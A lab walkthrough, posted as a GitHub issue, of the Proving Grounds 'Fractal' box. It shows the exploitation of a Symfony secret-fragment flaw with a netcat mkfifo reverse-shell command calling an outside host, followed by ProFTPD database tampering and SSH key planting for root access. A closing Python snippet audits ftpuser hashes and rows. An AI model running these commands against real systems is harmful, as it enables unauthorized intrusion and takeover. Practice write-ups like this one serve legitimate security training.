WDavid404 / PG-Box

PG box walkthrough note

Fractal (easy) #13

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Key points:

[PE]

WDavid404 commented 4 months ago
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 61 ProFTPD
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 2 disallowed entries 
|_/app_dev.php /app_dev.php/*
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Welcome!
|_http-favicon: Unknown favicon MD5: 231567A8CC45C2CF966C4E8D99A5B7FD

Regarding port 80, http://192.168.243.233/phpmyadmin/index.php
--> tried some common credentials --> didn't work

http://192.168.243.233/robots.txt -->

Disallow: /app_dev.php
Disallow: /app_dev.php/*

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.233/app_dev.php/FUZZ --> no info

See /app_dev.php --> Symfony 3.4.46 [image]

Also tried LFI on GET /app_dev.php/_profiler/open?file=§a§ --> didn't work.

According to the article, we can read app/config/parameters.yml: http://192.168.243.233/app_dev.php/_profiler/open?file=app/config/parameters.yml -->

parameters:
    database_host: 127.0.0.1
    database_port: 3306
    database_name: symfony
    database_user: symfony
    database_password: symfony_db_password
    mailer_transport: smtp
    mailer_host: 127.0.0.1
    mailer_user: null
    mailer_password: null
    secret: 48a8538e6260789558f0dfe29861c05b

Searched for a Symfony 3.4.46 exploit --> https://github.com/ambionics/symfony-exploits/tree/main

python3 secret_fragment_exploit.py 'http://192.168.161.233/_fragment' --method 2 --secret '48a8538e6260789558f0dfe29861c05b' --algo 'sha256' --internal-url 'http://192.168.161.233/_fragment' --function system --parameters 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.45.222 80 >/tmp/f' --> [image]

Accessing the URL above, I got a reverse shell from the target host. [image]

PE:

cd /etc/proftpd
ls
cat sql.conf

[image]

python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
mysql -u proftpd  -pprotfpd_with_MYSQL_password
show databases;
use proftpd;
show tables;
select * from ftpuser;

[image] [image]

Refer to: https://medium.com/@nico26deo/how-to-set-up-proftpd-with-a-mysql-backend-on-ubuntu-c6f23a638caf

"Password in the passwd field should be encrypted. To do so you can use this snippet (on your terminal) to generate the password string you can paste into the passwd field:"

/bin/echo "{md5}"$(/bin/echo -n "password" | openssl dgst -binary -md5 | openssl enc -base64)

--> {md5}X03MO1qnZdYdgyfeuILPmQ== [image]

We can update the current www user or add a benoit user.

update ftpuser set passwd='{md5}X03MO1qnZdYdgyfeuILPmQ==' where id = 1;
update ftpuser set homedir='/' where id = 1;
update ftpuser set shell='/bin/bash' where id = 1;
update ftpuser set uid=1000,gid=1000 where id=1;

Refer to https://medium.com/@ardian.danny/oscp-practice-series-19-proving-grounds-fractal-4239c06a0dc8

INSERT INTO ftpuser (id, userid, passwd, uid, gid, homedir, shell, count, accessed, modified) VALUES (2, 'benoit', '{md5}X03MO1qnZdYdgyfeuILPmQ==', '1000', '1000', '/', '/bin/bash', '0', '2022-12-05 05:26:29', '2022-12-12 05:26:29');

(According to /etc/passwd, we knew that benoit's uid and gid are 1000,1000.) [image]

ftp benoit@192.168.161.233 (pwd is "password") -->

cd /home/benoit
mkdir .ssh
put authorized_keys

Then, ssh -i ~/.ssh/id_ed25519 benoit@192.168.161.233 -->

$ sudo -l
Matching Defaults entries for benoit on fractal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User benoit may run the following commands on fractal:
    (ALL) NOPASSWD: ALL

So, run "sudo su" to switch to root.
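The {md5} value quoted above is ProFTPD mod_sql's OpenSSL-style hash (SQLAuthTypes OpenSSL): "{algo}" followed by the base64 of the raw, unsalted digest. The following is an added example, not code from this issue or from ProFTPD: it reproduces that one-liner in Python, verifies a password against a stored ftpuser.passwd value, and audits ftpuser rows for the weaknesses this box shows (unsalted digest, homedir set to /, interactive shell). The sample rows are constructed, not the box's real table.

```python
import base64
import hashlib
import hmac
# Digests ProFTPD mod_sql accepts with SQLAuthTypes OpenSSL: the stored value
# is "{algo}" followed by base64 of the raw digest, with no salt at all.
DIGESTS = {"md5": hashlib.md5, "sha1": hashlib.sha1,
           "sha256": hashlib.sha256, "sha512": hashlib.sha512}

def proftpd_openssl_hash(password: str, algo: str = "md5") -> str:
    """Same output as the openssl dgst | openssl enc -base64 one-liner above."""
    raw = DIGESTS[algo](password.encode("utf-8")).digest()
    return "{%s}%s" % (algo, base64.b64encode(raw).decode("ascii"))

def parse_stored(stored: str) -> tuple:
    """Split '{algo}base64' into (algo, raw digest); ValueError if malformed."""
    if not stored.startswith("{") or "}" not in stored:
        raise ValueError("not an OpenSSL-style ProFTPD hash")
    algo, b64 = stored[1:].split("}", 1)
    if algo not in DIGESTS:
        raise ValueError("unsupported digest %r" % algo)
    return algo, base64.b64decode(b64, validate=True)

def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of a password against an ftpuser.passwd value."""
    algo, raw = parse_stored(stored)
    return hmac.compare_digest(DIGESTS[algo](password.encode("utf-8")).digest(), raw)

def audit_ftpuser(rows: list) -> list:
    """Flag rows with the weaknesses and tampering marks seen in this box."""
    findings = []
    for r in rows:
        tag = "ftpuser id=%s (%s)" % (r["id"], r["userid"])
        try:
            algo, _ = parse_stored(r["passwd"])
            if algo in ("md5", "sha1"):
                findings.append(tag + ": unsalted %s password hash" % algo)
        except ValueError as err:
            findings.append(tag + ": " + str(err))
        if r["homedir"] == "/":
            findings.append(tag + ": homedir is the filesystem root")
        if r["shell"] not in ("/bin/false", "/usr/sbin/nologin", "/sbin/nologin"):
            findings.append(tag + ": interactive shell " + r["shell"])
    return findings

# Constructed sample rows (not the box's real table): id=1 is a sane entry,
# id=2 mirrors the row the post shows being inserted for "benoit".
SAMPLE_ROWS = [
    {"id": 1, "userid": "www", "passwd": proftpd_openssl_hash("correct horse", "sha512"),
     "homedir": "/var/www", "shell": "/bin/false"},
    {"id": 2, "userid": "benoit", "passwd": "{md5}X03MO1qnZdYdgyfeuILPmQ==",
     "homedir": "/", "shell": "/bin/bash"},
]
```

Running audit_ftpuser over the real ftpuser table (or a periodic dump of it) is a cheap way to catch the homedir/shell/uid rewrite shown above after the fact.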